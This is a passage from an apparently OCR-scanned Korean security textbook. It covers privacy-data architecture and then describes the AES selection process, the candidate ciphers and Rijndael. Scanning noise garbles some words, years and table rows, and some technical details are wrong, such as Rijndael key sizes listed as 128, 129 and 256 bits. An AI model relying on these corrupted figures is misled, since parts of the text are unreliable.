기업론리기능이 응용내에서 실행될 때 이 기업들의 기능들사이의 통신을 위하여 권 
고된 표준은 존재하지 않는다. 응용의 조작과 분석을 다루는 기업방책들에서는 정보가 
이러한 자동체계내에서 어떻게 통신되는가를 정확히 지적하고 있다. 

사적 비밀을 보증하는 기 업 론리를 실행 하는 기 능과 사적 비밀자료기 능사이의 통신을 
위한 중재위 치는 마이크로쏘프트의 객체요구매개 자의 구조 ( COM / DCOM ) 또는 Web 기 반 
봉사 ( P 3 P ) 이다. 이러한 요소대면부를 통과하는 P 3 P 대화정보는 사적비밀표현요소에서 통 
과하는 정보와는 다르다. 자료통신에 대한 하부구조(례컨대 특히 CORBA , 통보문화 DB 2) 
는 자기 의 하부구조를 적 당히 유지 하고 있 다. 

사적비밀자료요소 그림 32 — 7은 소비 자의 사적 비 밀을 보증하는 기 업요구사항을 지 
원 하기 위하여 사적비 밀 자료요소내 에 서 필 요한 기 능들을 보여 준다. 4개 의 기 능작성블로 
크가 정의된다. 



그림 32-7. 소비 자의 사적 비밀을 보장하는 사적비밀 자료요소내 에서의 기능들 


그림 에서 왼쪽에 있는 두 블로크들은 보안요구사항을 리행하는데 필요한 자료무결성 
보호기 능과 자료접 근조종기능을 나타낸 다. 제 일 아래 에 있 는 블로크는 개 인 자료와 사적 
비밀선택안에 대하여 수행되는 추적활동과 관련한 기능들을 나타낸다. 이러한 기능들은 
추적가능성 과 회 계가능성 의 요구사항을 리행하는데 필 요하다. 나머 지 두개 의 블로크들聲 
선택/동의，개 인자료와 사적 비밀선택안에 대 한 접 근，시 간/리용제한，닉 명/가명 등의 사적 
비 밀 요구사항을 리행하는데 필 요한 기 능들을 나타낸 다. 

사적비밀자료요소는 또한 개인자료접근 또는 기업론리요소에 응답하기전에 이미 형 
성 된 사적 비 밀 선택안에 따라 자료를 려 과하는 기 능도 수행한다. 더우기 사적비 밀 자료요 
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소는 자료기지 또는 특정 한 응용프로그람안에 보관된 개 인자료에 대 한 사적 비밀메 타자료 
봉사를 제공하는 기능도 수행 한다. 

사적 비밀자료기 능이 비 자료기지 응용프로그람에 실행될 때 이 사적 비밀자료기 능들의 
통신에 대하여 권고된 표준안은 존재하지 않는다. 응용의 조작과 분석을 다투는 기업방 
책들은 자동체내에서 정보들이 어떻게 통신되는가를 정확히 지적하고 있다. 사적비밀자 
료기능이 자료기지체계 응용안에서 실행될 때 기능들의 통신을 위하여 권고된 표준은 
SQL , XML , MDIS , ODBC 그리 고 OLE / DB , OLE / DBO 이 다. 

성능관점 성능관점은 소비자의 사적비밀을 보증하는 결과로 구조에 영향을 주는 성 
능문제들을 다룬다. 임의의 체계에서 성능은 특성 및 기능과 균형을 맞춘다. 균형맞춤은 
요구되는 특성과 기능 그리고 접수할수 있는 성능사이에서 이루어 진다. 

그림 32_6에서 보여 준 사적비밀표현요소안에서 성능에 크게 영향을 주는 기능들은 
선택/동의，접근(실시간 또는 지연)，추적가능성(경과 기록수준에 따라서)，보안과 관련한 
요구사항을 실현하는 기능들이다. 통지를 실현하는 기능들은 성능에 크게 영향을 주지 
않을것으로 예상된다. 

그림 32 — 7에서 보여 준 기업론리요소안에서 성능에 크게 영향을 주는 요소들은 선 
택/동의，접 근(사적비 밀규칙 의 실시 와 관련된)，추적가능성 과 관련한 요구사항을 실현하는 
기 능들이 다. 사적비 밀 규칙 의 유지 를 실 현 하는 기 능들은 성 능에 크게 영 향을 주지 않을것 
으로 예상된다. 

그림 32_7에 서 보여 준 사적비 밀 자료요소안에 서 성 능에 크게 영 향을 주는 기 능들은 
접 근，시 간/리용제한，추적가능성，보안과 관련한 요구사항을 실현하는 기능들이 다. 이와 
같이 성능은 개인자료를 어디에 그리고 어떻게 보관하고 유지하는가에 따라 좌우된다. 
테 라자료보관고를 리용한 실현에서 성 능은 영 향을 제 일 적 게 받는다. 왜 냐하면 소비 자의 
사적 비밀을 보증하는 요구사항들이 기존자료보관고설계 에 적응될수 있기때 문이 다. 다른 
자료보관고，중간자료보관고，자료기 지 류형，개 인 자료를 유지 하는 다른 류형 의 응용프로 
그람들은 사적 비 밀 요구사항과 관련한 추가기 능들로 하여 성 능이 일정하게 떨 어 진다. 

3개의 주요구조요소들사이의 통신실현방법을 어떻게 선택하는가에 따라서도 성능이 
좌우된다. 개인의 사적비밀보호 ( P 3 P ) 에 대한 www 단체 ( w 3 c ) 의 표준은 여러가지 거래에 대 
한 성능문제를 내포하고 있다. 그러나 광범한 리용에도 불구하고 이러한 표준이 변경되 
고 있 는 리유로 하여 성 능문제 가 공개 되 지 않고 있 다. 

리용성/신뢰성관점 리용성/신뢰성관점은 소비자의 사적비밀을 보증하기 위한 구조적 
인 해 결의 리용성 과 신뢰 성 에 대 한 영 향과 관련된다. 리용성 은 체 계 고장사이의 시 간과 
관련된 문제이고 신뢰성은 체계고장의 주기와 관련된 문제이다. 임의의 체계에서 접수할 
수 있는 리용성 과 신뢰 성준위 는 산업조작환경 의 요구사항에 의하여 결정 된다. 

매개 산업에서 제기되는 질문은 사적비밀이 체계와 통합되여 사적비밀기록접속과 같 
은 사적비밀관련요소들이 무효하게 될 때 전체 체계가 정지하는가 안하는가 하는 문제이 
다. 소비자의 사적비밀과 관련한 세계적인 법적문건이 주어 진다면 대부분의 산업들은 
모든 사적 비밀관련요소들에 대 하여 높은 리용성과 신뢰성 을 규정할 필요가 있다. 명 백히 
규칙 이 복잡하면 할수록 실행도 그만큼 복잡해 질것 이다. 

OA & M 관점 OA & M (운영，행정，관리)관점은 소비자의 사적비밀을 보증하기 위한 구 
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조적인 해결의 조작，주관，관리에 대한 영향을 취급한다. 임의의 체계에서 OA & M 요구사 
항은 기 업방책 과 운영 환경 에 의하여 결정 된 다. 사적 비 밀 에 의하여 영 향을 받는 OA & M 체 
계의 이러한 측면들은 유일하게 구조와만 련관되여 있다. 

OA & M 체 계 들은 수단과 하부구조，관리응용을 실 행하는 요소들을 포함한다. 관리하 
부구조는 전적 으로 관리 기 능을 지 원하기 위하여 존재 하기때 문에 사적 비밀요구사항으로부 
터 일어 나는 이러한 요소들에 대하여 예상되는 영향은 존재하지 않는다. 주되는 영향은 
사적비밀을 보증하는 결과에 요구되는 추가적인 수단 그리고 새로운 수단과 관련한 자료 
를 조종하기 위하여 창조되 는 새 로운 관리응용들로부터 발생한다. 

사적 비밀을 위한 수단에 필요한 사건들에는 개 인/기밀자료에 대 한 접근，개 인/기밀자 
료요소에 대한 접근주기，중요한 사건들의 기록，개 인/기밀자료에 대한 여벌복제와 회복， 
성능감시 등이 포함된다. 개인자료항목에 대한 발표번호，위반번호，경보의 번호와 류형 
을 설정하기 위하여서는 경계번호가 필요할것이다. 경보는 개인자료에 대한 접근시도뿐 
아니라 예상하지 못했거나 비법적인 접근시도를 밝혀 내기 위해서도 필요하다. 

개 인자료를 보관하고 유지 하는 어떤 형 태의 자료기지 를 리용하는 실현인 경 우 기존 
자료관리체 계규칙 은 사적 비밀관련도구프로그람과 사적 비밀관련사건들을 감시 하는 관리응 
용프로그람을 확대 하기 위하여 필 요하다. 합법 적 인 체 계 관리 자와 자료기 지관리 자는 사적 
비밀을 보증하기 위 하여 요구되는 추가적 인 문계들과 규칙들을 창조하기 위 하여 법적 문 
건과 규칙들을 알아야 하며 적응하여야 한다. 이러한 관리자들은 또한 보안을 위하여 사 
적비밀기 록에 대 한 배 타적 인 접 근을 가져 야 한다. 

요 약 

이 장에서는 회사들이 자료보관고환경에서 소비자들의 사적비밀과 보안을 보증하는 
방향으로 자기 의 제 품과 봉사를 전개하는데 필요한 문제 들을 설 명하였 다. 회 사들은 자기 
의 산업 환경 을 시험해 보고 산업 구조가 변경되 는데 따라 보안과 사적 비밀문제를 론의 한 
이 장의 내 용을 리용하기 바란다. 이 장의 내 용을 수정하려는 권고안들은 더 합리적 이 고 
더 정 확한 정 보를 수집하는 과정 을 위하여 필 요한 문제 라고 생 각한다. 
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제 5 편 
암호 기법 


암호기법은 해당한 수신자외에는 누구도 그 내용을 읽을수 없게 극비로 써넣는 기술 
이다. 비밀이나 신뢰성을 목적으로 정보를 변환하는 능력은 쓰기자체의 발생과 함께 존 
재하여 왔다. 오늘 암호기법의 일부 요소기술들이 접근조종，인증，통보문무결성，부인방 
지의 실현 등 여러 분야에서 신중한 정보의 보안에 영향을 준다. 

줄리어스 케자르시대에는 자모대입방법을 리용하여 은서법이 나왔다. 실례로 자모글 
자들을 뒤섞어 놓음으로써 읽기 쉽던 통신문이 뒤범벅이 되고 해독하기 어려워 졌다. 시 
간이 감에 따라 기존암호화방법론들이 약화되거나 파멸되자 통신문들의 안전성을 보장할 
수 있도록 점점 더 복잡한 방법론들이 많이 개발되였다. 

이 편에서는 암호화기술에 대하여 여러가지로 고찰한다. 제33장에서는 1970년대 초 
에 개발된 자료암호화표준인 DES 의 교체과정을 언급한다. 1997년에 선진암호화표준에 
대한 조사연구가 국가적으로 진행되여 DES 후보자에 대한 다음과 같은 내용의 설명서가 
발표되 였 다. 

• 128 bit 의 블로크암호화를 리 용하는 대 칭알고리 듬 

• 128, 192, 256 bit 크기 의 열쇠 지원 

• 전 세계적범위 에서 특허 료없이 사용 

• 30년간 자료를 보호할수 있을 정도의 보안제공 

• 하드웨 어 및 쏘프트웨어 적 으로 쉽 게 실 현 

• 스마트카드나 이동전화와 갈은 환경에서 실현가능 

1998년 15개의 AES 후보안들이 확정 되 였으나 1999년에 다시 선택한 결과 그가운데 서 
다섯개의 대 안들이 확정되였다. 2000년 말에 린멜 ( Rijndael ) 알고리듬이 당선되였다. 이 글 
을 쓸 당시는 AES FIPS (Federal Information Processing Standard ) 의 평가기간인데 최종결말 
은 20()1 년 4.4 분기에 있게 된다. 이 편의 첫 장에서는 린댈알고리듬의 선택동기，그것의 
견고성，취 약성 등을 비 롯하여 상세하게 고찰한다. 

이 편의 두번째 장에서 는 공개열쇠 기반과 단일뿌리열쇠 고유의 약점 들을 조사한 
다. 저자는 암호기법적으로 안전한 수자식시간도장의 개념을 소개하면서 PKI 내의 그 
수자식인증서들은 정확히 설정되면 뿌리열쇠의 가능한 타개로부터 보호된다고 주장 
한다. 
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제 3 3 장. 선진암호화표준 ( AES ) 에 대한 고찰 


벤 로드케 


1970 년대 초 자료암호화 표준 (DES: Data Encryption Standard) 이 련방정보처리 표준 (FIPS: 
Federal Information Processing Standard) 으로 되 였 다. 이 것 은 거 의 소문도 없 이 지 어 대 중적 인 
관심조차 거의 없이 조용히 일어 난 일이 였다. 사실 1960 년대 말과 1970 년대 초에도 국가적 
인 암호화시 책 에 영 향을 주고 있던 광범한 대중적 관심 이 거기 에는 전혀 돌려 지지 않고 있 
었 다. 그것 은 개 인용콤퓨터 가 널 리 류포되 기 전에 미 리 주의 를 돌렸어 야 할것이 였 다. 그때 
HPS 의 영 향력 은 정 부가 구매 력 을 발동할만큼 막강한것이 였 다. 오늘날에 와서 FIPS 의 세 력 
이 소비 자시 장의 영 향을 받는 콤퓨터 회 사들의 수익 성 에 미 치 는 영 향은 훨 씬 더 적 은것 이 다. 

1990 년대 말에 이르러 정세는 아주 달라 졌다. DES 의 후보로 선출된 선진암호화표 
준 (AES) 은 U . S . Federal 穴 행/자 er 와 연구잡지 들뿐아니 라 소비 자를퓨터 잡지 들과 주요매 체 
들애까지 선전광고되였다. 

AES 선출과정은 본질에 있어서 전 세계적으로 론의되고 있는 문제였다. 이것은 세계 
적으로 제출되는 암호전문가들의 제출안들을 보면 잘 알수 있다. AES 과정 이 완전히 개 
방되여 대중적인 여론조사와 론평회들이 진행되였다. 이것은 아주 중요하다. 그것은 효과 
적 인 암호화알고리듬설계에 관하여 력사는 안전한 암호화알고리듬이 허공에서는 설계될 
수도，검 사될수도，검증될수도 없다는것을 몇번이 나 보여 주었기때 문이 다. 사실 쏘프트웨 
어판매 업체들이 전용암호화알고리 듬을 사용하기 로 결정 한다면 그것은 곧 그 암호화알고 
리듬의 안전성과 효과성에 대한 의심을 낳게 될것이다. 조심성에 사로 잡혀 있는 암호화 
기 술의 소비 자들은 전용암호화알고리 듬을 결 코 사용하지 않을것 이 다. 

이 견해 는 커 크호프 (Kerckhoff) 의 가설 에 기 초한것 이 다. 이 가설 에 의 하면 암호화체 계 
의 안전은 전적으로 열쇠의 비밀에 달려 있는것이지 알고리듬의 비밀에 따르는것이 아니 
라는것이다. 그러나 력사는 아직도 일부 판매업체들이 완전히 공개된 암호화알고리듬만 
이 실지로 세계적수준의 암호화알고리듬으로 설계될수 있는 유일한 길이라는 사실을 망 
각하고 있다는것을 보여 주고 있다. 


AES 과 정 

1997 년 1 월 국가표준화 및 기술연구소 (NIST: National Institute of Standards and 
Technology) (상무성의 한 부서)는 AES 과정에 착수하였다. DES 의 허점이 늘어 남에 따라 
DES 의 후보안이 요구되였다. DES 에서는 어떤 의의 있는 구조적부분도 찾아 볼수 없었으 
며 오히려 무어 (Moore) 의 법칙을 통하여 DES 의 약점들이 늘어 났다. 1998 년에 들어 와서 
적 당한 투자결과 DES 암호해득장치를 만들수 있게 되였다. 

그때 까지 DES 가 세계적 으로 가장 널 리 보급되 였고 일반목적의 암호화체 계였으므로 
적수가 DES 암호해득장치를 사용할수 있다는것 이 가지 는 의의 가 납득될리 만무하였다. 
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이 DES 암호해득장치의 세부에 대하여서는 Electronic Frontier Foundation 에서 출판한 
Cracking DES : Secrets of Encryption Research , Wiretop Politics & Chip Design (1998. O ’ 
Reilly & Assoc ., ISBN : 1565925203) 을 참고하기 바란다. 

DES 는 혁신적으로 재설계되여 Triple-DES 의 사용을 통하여 정상상태를 회복하였다. 
Triple-DES 는 입 력 자료를 취 하고 그 입 력 자료를 세 번 암호화한다. Triple - DES(ANSI 
X 9.52-1998 로 리용되 는 공식표준)는 강제 적 인 공격 들에 대 하여 유연하며 보안적 견지에 서 
도 그만하면 충분하였다. 그러면 왜 새로운 AES 로서 간단하게 Triple-DES 를 쓰지 않는가. 
그것 은 DES 는 장치 적 으로 실현할수 있도록 설계되 였으며 따라서 쏘프트웨어 적실현에서 
는 효과가 없기때문이였다. Triple-DES 는 DES 보다 속도가 세배나 뜨다. DES 속도가 충분 
히 빠르다면 Triple-DES 의 속도는 너 무 느리 다. AES 에 대 한 기 준의 하나가 쏘프트웨 어 적 
으로 실현될 때 효과가 있어 야 한다는것 이며 Triple-DES 의 기초적 인 구성 방식 은 AES 후 
보자로서는 적합치 못하였다. 

AES 기술설명서에서는 열쇠의 크기를 128, 192, 256 bit 까지 지원하면서 128 bit 크기의 
블로크암호화를 리 용하는 대 칭알고리 듬(암호화와 복호화에 같은 열쇠리용)을 요구하였 다. 
알고리듬은 특허료 없이 전세계적범위에서 사용되며 30년동안 자료를 보호할수 있는 충 
분한 수준의 보안을 제 공할수 있 어 야 하였 다. 또한 장치적 으로는 물론 쏘프트웨어 적 으로 
그리고 제한된 환경들(실례로 스마트카드， DSP , 이동전화， FPGA , 주문 ASIC , 위성 등)에 
서 쉽게 실현할수 있어 야 한다. 

AES 는 정부기관들에서 신중한 안전성을 요하지만 비밀이 아닌 자료들에 리용될것이 
다. 분명 히 모든 징조로 보아 AES 는 머지 않아 응당 사영부분에서도 상업거 래 를 위한 
실제상의 암호화표준으로 될것 이 다. 

1998년 8월 NIST 는 캘리포니 아에서 열린 제1차 AES 후보안선출대회 에서 15개의 예 
비적인 AES 후보안들을 선출하였다. 그때 15개의 AES 후보안들은 전세계적 인 암호화사회 
에 서 더 욱 강력한 여 론조사와 검 토를 받았다. 그 과정 에 는 국가안전보장국 ( NSA : National 
Security Agency ) 도 참여 하였 다. 

여 기 에서 AES 선출과정 에 NSA 가 참여한 상세한 내 용은 언급하지 않지 만 NIST 가 
DES 의 발전에 대한 NSA 의 교훈을 많이 참작하였다는것을 명백히 해둔다. DES 에 대한 
초기 의 불만은 IBM 이 정 부의 요청 에 따라 DES 의 설계원칙 들을 비밀 에 붙였 다는것 이 다. 
이것은 DES 가 국가적인 정보사회에 모든 암호화된 자료에로의 완전한 접근을 제공해 주 
는 어떤 부류의 함정통로를 내포하고 있다는 추측을 낳게 하였다. 그러나 1992년에 DES 
설계원칙 이 마침 내 공개 되 자 그런 억 측은 반박을 당하게 되 였 다. 

AES 후보안들 

1차 AES 후보안선출대회에서 선택된 15개의 AES 후보안들을 표 33 — 1에 렬거하였다. 

2차 AES 후보안선출대회가 1999년 3월 로마에서 열렸는데 여기서는 1차후보안알고리 
듬들에 대 한 분석검 토가 진행되 였 다. 이 여 론조사기 간후에 1999년 8월 NIST 는 보다 넓 은 
규모에 서 분석검 토된 5개 의 알고리 듬들을 선출하였 다(표 33-2 참고). 
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1 차 AES 후보안선출대회에서 선택된 AES 후보안 


알고리듬 

제 출 자 

요 약 

CAST-256 

Entrust Technologies, 

(카나다) 

CAST-128 파 같은 round 함수들을 사용하는 48회 불균형 
Feistel 의 암호. + -XOR 회전과 4개의 고정된 6bit S 상 
자를 사용. 하나의 열쇠스케듈지원 

Crypton 

Future System, Inc., 

& | XOR 회 전과 2개의 고정된 8bit S 상자들을 사용하는 
round 함수를 가지 는 12회 반복암호. 여 러 가지 열쇠 길 이 
지원，이전의 SQUARE 암호에서 유래 

DEAL 

Richard Outerbridge (영 국) 

와 Lars Knudsen (노르웨 이 ) 

약간 차이가 있는 제안인데 round 함수로서 현존 DES 를 
사용하는 6〜 8회 Feistel 암호. 따라서 현존분석들이 많이 
리용될수 있지만 속도에서 일정하게 손해를 볼수 있다. 

DFC 

Centre National pour la 
Recherche scientifique (프랑스) 

상관성기 술에 기 초하여 설계 되 고 +X 와 round 함수에서 
의 치 환을 리 용하는 8회 Feistel 암호. 4회열 쇠 스케 듈 

E2 

Nippon Telegraph 
와 Telephone 

Corporation (일본) 

12회 Feistel 암호. 하나의 고정된 8bit S 상자，치환， 
XOR, 혼합연산，바이트회전들의 대입으로 이루어 진 
비선형함수사용 

FROG 

TecApro International 
(남아프러 카) 

8회암호. 매 회 에서 4개의 기초연산수행 (XOR， 단일고정 
8bit S 상자를 러용한 대입，들어 오는 매 바이트당 테블 
값 교체) 

HPC 

Rich Schroeppel 

8회 Feistel 암호. +-<&|XOR 회 전과 색 인레 블을 리용 
하여 8개의 내부 64bit 변수들뿐아니 라 자료도 수정 

LOK197 

Lawrie Brown, 

Josef Pieprzyk, 

Jennifer Seberry 
(오스트랄리아) 

고정된 libit, 13bit S 상자들과 치환 그리고 +XOR 결합 
을 리용하는 두개 의 S-P 층이 있는 복잡한 round 함수 f 
를 사용하는 16회 Feistel 암호. 복잡한 round 함수 f 를 사 
용하는 48회의 불균형 Feistel 망을 리용하는 25的 it 열쇠 
스케듈 

Magenta 

Deutsche Telekom 

(도이 월 란드) 

6〜8회 Feistel 암호. 하나의 고정된 S 상자 (GF(2) 에 대한 루 
승법 에 기 초)를 리 용하는 수많은 대 입 을 사용하는 round 
함수사용. XOR 를 사용하는 열쇠비 트들로 호상결합 

MARS 

IBM, INC. 

8+16+8회불균형 Feistel 암호로서 다음과 같은 뚜렷한 네 
단계를 가진다. 열쇠추가 및 8회의 열쇠 없는 앞방향혼 
합，8회의 열쇠 있는 앞방향변환，8회의 열쇠 있는 뒤 
방향변환，8회의 열쇠 없는 뒤방향혼합과 열쇠 있는 덜 
기 . round 는 +- 회 전 XOR 그리 고 두개의 고정된 8bit S 
상자를 리용한다. 

RC6 

RSA Laboratories. 

20회 반복암호. RC5 로부터 발전. 매회에 자료를 혼합하 
는데 많은 32bit 연산 (+-X XOR 회 전)리용 

Rijndeal 

Joan Daemen 과 

Vincent Rijmen 
(벨지 끄) 

10〜 14회 반복암호. byte 대 입 . 렬 밀 기，행 혼합，열 쇠 추가 
뿐아니라 초기 및 마지막 회전에 열쇠추가 러용. 이전 
의 SQUARE 암호에서 유래 




SAFER+ 

Cylink. Corp. 

XOR 와 2 개 의 고정 된 8bit S 상자리용 

SERPENT 

Ross Anderson (영 국)， 

Eli Biham 

Lars Knudsen (노르웨이) 

32회 Feistel 암호. 매회에서 XOR 와 회전을 5 
쇠혼합, 8개 의 열쇠 독립 4bit S 상자，선형변횐 

Twofish 

Bruce Schneier 

John Kelsey 등 

4개의 열쇠독립 8bit S 상자，행렬변환, 회전될 
부분적으로 Blowfish 암호에 의존하는 16회 F( 


출처: http://www.adfa.edu.au/~lpb/papers/unz99.html 


표 33-2 NIST 에서 선출된 5개의 알고리듬 


알고리듬 

주요장점 

주요약점 

MARS 

높은 안전여유도 

실현 복잡성 

RC6 

매우 단순하다 

32bit 처 리 소자에 특정한 연산을 리 용 
안전여유도가 낮다 

Rijndael 

단순하면서도 기교 있게 설계 

불충분한 회수 

Serpent 

높은 안전여유도 

복잡한 설계 및 해석，유치 한 
성능 

Twofish 

상당히 성능 높은 안전여유 S 

복잡한 설계 


18 달이 상 검 사와 분석 검 토를 진행한후 2000 년 10 월 에 NIST 는 린댈알고리 
Algorithm) 이 AES 후보안으로 선출되 였 다는것 을 공포하였 다. 흥미있는것 은 NIS r 
고리듬선출에 관한 공포가 발표된지 불과 며칠 지나서 벌써 새로운 표준을 ^ 
고들이 앞을 다투어 나타나게 되였다는것이다. 

20()1 년 2 월 NIST 는 AES FIPS 초안을 공개적인 심의와 평가에 붙여 2001 년 
끝마쳤 다. 

그후 20()1 년 6 월부터 8 월에 걸쳐 90 일간의 평가기간이 있었다. 대략적인 
르면 표준화과정은 20()1 년 4.4 분기에 완전한 결말을 보게 되리라는것이 기대 s 
AES 는 FIPS 로 공식 화될 것 이 다. 

DES 는 사멸하였다. 

56bit DES 가 비효과적 이 라는것 은 명 백하며 사실 상 그것 은 사멸 하였 다. 1« 



DES 는 1981 년에 ANSI 표준 (ANSI X3.92) 으로 수락되 고 후에 여 러개의 전국은행협 회 
재 정 봉사 (X9) 표준들에 통합되 였지 만 Triple-DES 로 교체 되 기 시 작하였 다. 

암호화알고리 듬들은 일 반적 으로 완전히 호환성 이 있 으므로 암호화알고리 듬교체 는 비 
교적 수월하다. 대부분의 하드웨 어실현품들은 플라그인들과 각이한 알고리듬으로의 교체 
를 허용한다. 가장 큰 난점은 수천수만개의 다른 종류의 장치들을 가지고 있는 회사들에 
대 한 쏘프트웨어 를 교체하는 세 부계 획 에 있 다. 또한 원격싸이 트들과 위 성 들을 가지 고 있 
는 그런 기관들에 대하여서는 이 문제가 보다 치명적이다. 

AES 실현제품들은 이미 많은 상업쏘프트웨어보안제품들에서 선택적알고리듬 
(Triple-DES 등)을 사용할수 있게 끔 출현하고 있 다. 쏘프트웨 어실현제 품들은 하드웨 어 를 
설계하고 갱신하는데 드는 시간때문에 항상 하드웨어제품이 나오기전에 나온다. 일반적 
으로 쏘프트웨어 를 갱 신하는것 은 하드웨 어 를 교체 하고 갱 신하는것 보다 더 쉬 우며 많은 
판매 업체들은 이미 자기들의 최 신설계들에 통합시 킨 AES 를 가지고 있다. 

이미 Triple-DES 를 운영하고 있는 그런 기관들에 대하여서는 즉시 AES 를 사용하여 
야 할 불가피 한 리유들이 많지 는 않다(호환성 제 외 ). 회 사들의 AES 갱 신속도는 보다 많은 
제품들이 AES 가능방식으로 이동함에 따라 더욱 증가할것 같다. 

린낼알고리듬 


AES 후보안인 린댈은 Proton World International 의 죠안 대먼 (Joan Daemen) 박사와 네 
데를란드의 카롤릭종합대학 전기공학부 박사과정을 마친 연구사인 빈쎈트 리멘 (Vincent 
Rijmen) 이 개발하였다. 대먼과 리멘박사들은 암호화사회에 잘 알려 져 있으며 존경을 받 
고 있다. 린멜 (Rijndael) 은 SQUARE 암호에 뿌리를 두고 있으며 대먼과 리멘에 의 하여 설 
계되였 다. 

린댈에 대한 세부들은 초기 AES 안에 설명되여 있다. 기술적견지에서 린댈은 열쇠크 
기 에 의 존하는 여 러 회 대 입 선형 변환망 (substitution-linear transformation network) (즉 비 
Feistel) 이다. 린댈열쇠크기와 블로크크기로는 128, 129, 256bit 가 될수 있다. 열쇠와 블로 
크크기 는 임의의 크기 를 지 원하지 않으며 반드시 이 세개 중의 하나라야 한다. 

린댈 은 바이 트입 구에 바이 트출구를 주도록 동작하는 단일 S 상자를 리용한다. 실현목 
적 에 따라 그것은 256byte 의 색 인표로 고찰될수 있 다. 린댈은 마당 GF(2) 에 대 하여 

S ( x )^ M ( l / x)+b 

로 정의되는데 여기서 사은 행 렬 이고 b 는 상수이다. 

린댈에 의하여 처 리되는 자료블로크는 바이트들의 묶음으로 분할되며 매 암호연 
산은 바이트단위로 진행된다. 린댈의 10 회암호화에서 매회는 4 개의 연산을 수행한다. 
첫 계 층에 서 8 X 8 S 상자(비 선형구성 요소로서 리용되 는 S 상자들)는 매 바이 트에 적 용된 
다. 두번째 계 층과 세번째 계층들은 선형혼합계층들인데 거 기 에서 배 렬의 렬들에는 
밀기 연산이 진행되며 행들에는 혼합연산이 진행된다. 네번째 계층에서 부분열쇠 바이트 
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들에는 배렬의 매 바이트들에로 XOR 연산이 진행된다. 마지막회에서 행의 혼합은 생 
략된 다. 


NIST 는 왜 린낼알고리듬들 선택하였는가 


NIST 의 언급에 따르면 린댈은 안전성，성능，효과성 이 결합되고 실현하기 쉬우며 유 
연성이 있기때문에 선출되였다고 한다. 

특히 NIST 는 다음과 같은 근거로 하여 린댈이 아주 적합하다고 인정하였다. 

• 넓은 범위의 를퓨터환경에서 하드웨어 및 쏘프트웨어적인 성능이 좋다. 

• 귀환 및 비귀환방식에서 다 성능이 좋다. 

• 열쇠 설정시 간상 아주 우수하다. 

• 열쇠민첩 성 이 좋다. 

• 매우 적은 기 억용량을 요구한다. 

• 파워 ( power ) 공격과 타이밍 ( timing ) 공격에 대처한 방어가 쉽다(이 방어는 힘들게 
어떤 처 리를 진행하지 않고 보장될수 있다). 

린멀의 문제점 


일반적 인 여론은 린댈이 근본적으로 최상의 알고리듬이라고 하지만 상반되는 견해가 
없는것은 아니다. 하나의 문제는 그것의 근저구성방식에 있는바 일부 사람들은 린댈의 
수학적기초가 단순하며 그 점 에서는 거의 미 발육단계 라고 의견을 제 기하였다. 만일 린댈 
을 수학식으로 전개한다면 임의의 다른 AES 후보안들보다 훨씬 더 간단할것이다. 다른 
하나의 비평은 린댈이 적수로부터 자기 암호화기교를 숨기기 위한 혼란기술 (obfuscation 
technique ) 을 하나도 쓰지 않는다는것이 였 다. 끝으로 암호화와 복호화연산에 같은 S 상자를 
리용하는 DES 와는 반대로 린댈은 서로 다른 S 상자를 리용한다는것이 지적되였다. 이것 
은 암호화연산과 복호화연산에 서 로 다른 S 상자를 리용하는 린댈실현이 한번만 연산을 
진행하는 실현보다 두배의 품이 들며 속박장치들에 대하여서는 불편할수 있다는것을 의 
미 한다. 

린 댈 림 은 보다 단순한 수학은 린 댈 을 하드웨 어내 장제 품으로 보다 쉽 게 실 현 할수 있 
게 한다고 하면서 자기들의 설계를 옹호해 나섰다. 그들은 또한 혼란기술은 필요가 없다 
고 주장하였다. 이것은 뒤를 이 어 린 댈 림 이 Hitachi 로부터의 조사를 모면하기 위하여 혼 
란기 술을 회 피하였 다는 억 측을 낳게 하였 다. Hitachi 는 자기 들의 의 향은 자기 의 특허 들을 
위 협하는 대 상들에 대 한 합법 적활동을 모색 하기 위한데 있 다고 표명하였 다. Hitachi 는 여 
러가지 암호화혼란기 술들에 대 한 독점 적 인 특허 들을 유지할것 을 주장하고 있는데 그밖의 
어떤 다른 단체에 그 기술들에 대한 특허가 넘어 가겠는가 하는것은 아직 미정이다. 사 
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실 2000년 초 Hitachi 는 4개의 AES 후보안들 ( MARS , RC 6, Serpent , Twofish ) 에 대하여 특허 
권청구서들을 제출하였다. 


AES 를 해득할수 있는가 


Cracking DES : Secrets of Encryption Research , Wiretap Politics & Chip Des/gn 에 상세 
히 서술된바와 같이 공개 DES 해득기가 개발되였지만 여전히 AES 해득장치가 개발될수 있 
는가 라는 질문이 존재하고 있 다. 

DES 에 대한 공격은 거의 30년간의 연구후에도 쉽게 발견되지 않았다고 언급되였을것 
이 다. DES 에 대 하여 유일 하게 가능한 공격 은 전체 열쇠 공간을 무자비하게 빠짐 없 이 람색 
하는것 이 다. DES 의 초기열 쇠 공간이 증가되 였 었 다면 AES 과정 은 착수되 지 않았을상 싶 다. 

가능한 모든 열 쇠 값들을 다 취 해 보면서 오랜 시 간후에 야 DES 열 쇠 를 되찾을수 있 는 
DES 암호해득기들이 제작되였다. AES 암호해득기도 역시 나올수 있지만 단일열쇠를 추출 
해 내는데 요구되는 시간은 상상을 초월할것이다. 

실례로 전체 DES 열쇠공간은 48시간안에 해득될수 있지만 AES 의 경우는 다르다. 만 
일 FPGA ( Field-Programmable Gate Array ) 와 같은 특별한 목적의 소자가 초당 10억 AES 복 
호화연산을 수행할수 있고 암호해득호스트가 병 렬로 동작하는 10억개의 소편을 가지 고 
있다고 해도 그 열쇠를 되찾는데는 상상할수 없는 시간이 요구될것이다. 만일 DES 열쇠 
를 1초에 해득할수 있는 기계가 개발되였다고 가정한다고 해도 그 기계가 128 bit AES 열 
쇠 를 해 득하는데는 140조년 이 걸릴 것 이 다. 

AES 의 불해득성(적어도 현존콤퓨터와 수학의 능력으로)으로 보아 2030년까지도 안 
전성의 요구를 충분히 만족시킬것이다. 그러나 다음에는 다시 DES 가 언제 처음으로 설 
계되 였는가 하는것 을 생 각해 본다면… 

결론적으로 말하면 실험실적단계로부터 실지 응용단계에로의 량자콤퓨터의 변혁 그 
자체 를 가정 한다면 그것 은 AES 와 다른 암호화체 계 에 의하여 제 공되 는 안전성 을 은근히 
위 협 할것 이 다. 


AES 에 대한 반응 


AES 를 제 품화에 로 추동한것 은 정 부와 재 정봉사회 사들이 다. 이 두 대 상에 대 하여 
AES 의 역할은 아주 다를것이다. 

정부측에 대 하여 이 야기한다면 AES 가 FIPS 로 확정된후 정부의 모든 기관들은 안전 
